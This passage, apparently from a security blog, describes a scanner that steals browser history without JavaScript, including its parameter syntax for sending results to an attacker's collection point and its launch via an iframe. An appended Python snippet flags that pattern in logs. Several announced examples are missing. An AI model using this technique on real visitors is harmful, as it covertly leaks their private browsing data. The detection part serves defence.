Still, I think that RSnake's approach is quite interesting and innovative. I decided to write a generic scanner that can be configured on the fly to steal any browser history. The scanner is located here. Before using it you need to pass several GET or POST (it is up to you really) parameters to the script like this:
noscript-hscan.php?u1=[url]&u2=[url]&t=[target collection point]
The scanner accepts any number of URLs. The only rule is that every URL parameter must start with u (lower case u). It is good practice to number the URLs that you want to scan as u1, u2, u3, etc. The t parameter is the target collection point, the place where the history information will be sent. The collection point will receive requests that look like the following:
The easiest way to launch the generated scanning code is to include it inside an iframe. For example, you can use something like the following:
This is it! It is simple.
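For defenders, the parameter convention described above (URL-valued parameters whose names start with u, plus a URL-valued t) is distinctive enough to look for in proxy or web server logs. The following is an added example, not code from the original post or the scanner: the log lines are constructed, the hosts are placeholders, and the heuristic only covers parameters sent via GET.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines ("METHOD URL"); all hosts are placeholders.
SAMPLE_LOG = [
    "GET http://scanner.example/noscript-hscan.php?u1=http://bank.example/"
    "&u2=http://mail.example/&t=http://collect.example/c",
    "GET http://shop.example/search?q=shoes&t=1",
    "GET http://other.example/x.php?u=http://a.example/&t=//collect.example/in",
    "GET http://news.example/article?utm_source=feed&t=http://news.example/",
]

# A value counts as URL-like if it is absolute or scheme-relative.
URLISH = re.compile(r"^(?:https?:)?//", re.I)


def classify(url):
    """Return (probed_urls, collection_point) when the query string follows
    the convention from the post: one or more parameters whose names start
    with lower-case u and hold URLs, plus a t parameter holding a URL.
    Return None otherwise."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    probes = [v for k, v in pairs if k.startswith("u") and URLISH.match(v)]
    targets = [v for k, v in pairs if k == "t" and URLISH.match(v)]
    if probes and targets:
        return probes, targets[0]
    return None


def scan(lines):
    """Flag log lines that match the convention and report which sites were
    being checked and which host would receive the results."""
    findings = []
    for line in lines:
        _method, _, url = line.partition(" ")
        hit = classify(url)
        if hit:
            probes, target = hit
            findings.append({
                "request": url.split("?")[0],
                "probed": probes,
                "collector": urlsplit(target).netloc,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requiring URL-like values keeps ordinary parameters such as utm_source from matching; a hit is a lead for review, not proof.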